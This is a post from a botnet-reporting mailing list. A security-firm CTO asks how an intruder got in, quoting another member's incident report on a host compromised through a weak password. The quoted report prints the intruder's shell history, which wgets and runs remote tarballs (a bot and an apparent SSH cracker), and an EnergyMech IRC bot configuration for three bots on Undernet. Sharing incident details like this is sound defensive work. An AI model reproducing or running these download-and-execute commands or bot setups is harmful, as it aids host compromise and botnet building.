To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
How did they get in?
Regards, Adriel T. Desautels Chief Technology Officer Netragard, LLC. Office : 617-934-0269 Mobile : 617-633-3821 http://www.linkedin.com/pub/1/118/a45 --------------------------------------------------------------- Netragard, LLC - http://www.netragard.com - "We make IT Safe" Penetration Testing, Vulnerability Assessments, Website Security bodik wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > ---------- > Hi, > > we've found one instance of bot from someone called Drow (tools were > compiled but not stripped somewhere in /home/drow ... ;))). Probably a > spanish speaking person. > > Undernet admins should take a look down below and check their servers. > if there are listening here .. > > access was gained by very very weak password, and standard procedure > comes, download bot, ssh cracker, spam tool ... > > was a kiddie, comes from 89.123.217.233, no with no cleanup and probably > a manual job .. > > ---- cut history ---- > > passwd > > ps x > > cd /tmp > > w > > ps x > > cd /tmp > > wget freewebs.com/staycu/stayku.tar > > tar xzvf stayku.tar > > cd .staycu > > ./linux > > cat /proc/cpuinfo > > cd /var/tmp/delles > > cd /var/tmp > > wget http://www.geocities.com/demonfire_16/delles.tar.gz > > tar xzvf delles.tar.gz > > cd delles > > ./a 200.62 > > nohup ./start 59 >> /dev/null & > > cd /var/tmp/delles > > cat vuln.txt > > ps x > > cd /var/tmp/delles > > cat vuln.txt > > ps x > > cd /var/tmp/delles > > cat vuln.txt > ... > ... > ---- cut history ---- > > bodik > > ---- cut ---- > > # Boqdan`S EnergyMech configuration file > # v2.9.3 - Boqdan > > ##### Linking ##### > #ENTITY emech > #LINKPASS abc123 > #LINKPORT 49152 > #LINK hismech a1b2c3 mech.host.net 49152 > #LINK hermech abcdefg 0 0 > AUTOLINK > > ##### Server List #### > SERVER diemen.nl.eu.undernet.org 6660 > SERVER diemen.nl.eu.undernet.org 6667 > SERVER diemen.nl.eu.undernet.org 6669 > SERVER lelystad.nl.eu.undernet.org 6666 > SERVER lelystad.nl.eu.undernet.org 6667 > SERVER lelystad.nl.eu.undernet.org 6668 > SERVER london2.uk.eu.undernet.org 6660 > SERVER london2.uk.eu.undernet.org 6669 > SERVER london2.uk.eu.undernet.org 7000 > SERVER graz.at.eu.undernet.org 6660 > SERVER graz.at.eu.undernet.org 6670 > SERVER graz.at.eu.undernet.org 7000 > SERVER helsinki.fi.eu.undernet.org 6666 > SERVER helsinki.fi.eu.undernet.org 6669 > SERVER helsinki.fi.eu.undernet.org 7000 > SERVER montreal.qc.ca.undernet.org 6665 > SERVER montreal.qc.ca.undernet.rog 6669 > SERVER montreal.qc.ca.undernet.org 7000 > SERVER oslo2.no.eu.undernet.org 6660 > SERVER oslo2.no.eu.undernet.org 6669 > SERVER oslo2.no.eu.undernet.org 7000 > > > > # SERVER 1.2.3.4 6667 ThisIsMyPassword > # SERVER 192.168.100.1 6669 moo:eu.undernet.org:6667 > > ##### Bot 1 Configuration ##### > NICK Boqdan > USERFILE 1 > CMDCHAR - > LOGIN gat > IRCNAME tundd > MODES +ix-ws > #VIRTUAL > #NOSEEN > > HASONOTICE 1 # Yes for Undernet. > TOG CC 1 # We want the bot to require command character > TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. > TOG SPY 1 # Tell who is executing what in the partyline. > SET OPMODES 6 # How many modes in a line? 6 on undernet... > SET BANMODES 6 # How many bans in a line? 6 on undernet... > SET CTIMEOUT 60 # Server connection timeout > SET CDELAY 30 # Delay between connection attempts > > CHANNEL #staycu.com # Channel name > TOG PUB 1 # Allow public(in-channel) commands? Yes. > TOG MASS 1 # Do mass-mode/kick/ban checks... > TOG SHIT 1 # Activate the shitlist for this channel > TOG PROT 1 # Activate protection of users > TOG ENFM 0 # Dont enforce channel modes. > SET MDL 5 # How many -o before killing the guy? > SET MKL 5 # How many kicks? > SET MBL 5 # And how many Bans? > SET MPL 1 # What to do with massmoders? > # 0 = nothing, > # 1 = kick the bastard, > # 2 = kickban 'em, > # 3 = kickban & shitlist them. > ##### END BOT 1 ##### > > ##### Bot 2 Configuration ##### > > NICK Guapo > USERFILE 1 > CMDCHAR - > LOGIN lmess > IRCNAME mesaju > MODES +ix-ws > #VIRtual > #NOSEEN > > HASONOTICE 1 # Yes for Undernet. > TOG CC 1 # We want the bot to require command character > TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. > TOG SPY 1 # Tell who is executing what in the partyline. > SET OPMODES 6 # How many modes in a line? 6 on undernet... > SET BANMODES 6 # How many bans in a line? 6 on undernet... > SET CTIMEOUT 60 # Server connection timeout > SET CDELAY 30 # Delay between connection attempts > > CHANNEL #staycu.com # Channel name > TOG PUB 1 # Allow public(in-channel) commands? Yes. > TOG MASS 1 # Do mass-mode/kick/ban checks... > TOG SHIT 1 # Activate the shitlist for this channel > TOG PROT 1 # Activate protection of users > TOG ENFM 0 # Dont enforce channel modes. > SET MDL 5 # How many -o before killing the guy? > SET MKL 5 # How many kicks? > SET MBL 5 # And how many Bans? > SET MPL 1 # What to do with massmoders? > # 0 = nothing, > # 1 = kick the bastard, > # 2 = kickban 'em, > # 3 = kickban & shitlist them. > ##### END BOT 2 ##### > > ##### Bot 3 Configuration ##### > > NICK Bogdy > USERFILE 1 > CMDCHAR - > LOGIN Lucru > IRCNAME LeLa > MODES +ix-ws > #VIRTUAL > #NOSEEN > > HASONOTICE 1 # Yes for Undernet. > TOG CC 1 # We want the bot to require command character > TOG CLOAK 1 # Ignore CTCP's from non-users? Yes. > TOG SPY 1 # Tell who is executing what in the partyline. > SET OPMODES 6 # How many modes in a line? 6 on undernet... > SET BANMODES 6 # How many bans in a line? 6 on undernet... > SET CTIMEOUT 60 # Server connection timeout > SET CDELAY 30 # Delay between connection attempts > > CHANNEL #staycu.com # Channel name > TOG PUB 1 # Allow public(in-channel) commands? Yes. > TOG MASS 1 # Do mass-mode/kick/ban checks... > TOG SHIT 1 # Activate the shitlist for this channel > TOG PROT 1 # Activate protection of users > TOG ENFM 0 # Dont enforce channel modes. > SET MDL 5 # How many -o before killing the guy? > SET MKL 5 # How many kicks? > SET MBL 5 # And how many Bans? > SET MPL 1 # What to do with massmoders? > # 0 = nothing, > # 1 = kick the bastard, > # 2 = kickban 'em, > # 3 = kickban & shitlist them. > ##### END BOT 3 ##### > ---- cut ---- > _______________________________________________ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law enforcement > upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
begin:vcard fn:Adriel T Desautels n:Desautels;Adriel T org:Netragard, LLC. adr:;;17 Sheldon Road;Mendham ;NJ;;USA email;internet:[EMAIL PROTECTED] title:Chief Technology Officer tel;work:617-934-0269 tel;cell:617-633-3821 x-mozilla-html:FALSE url:http://www.netragard.com version:2.1 end:vcard
signature.asc
Description: OpenPGP digital signature
_______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets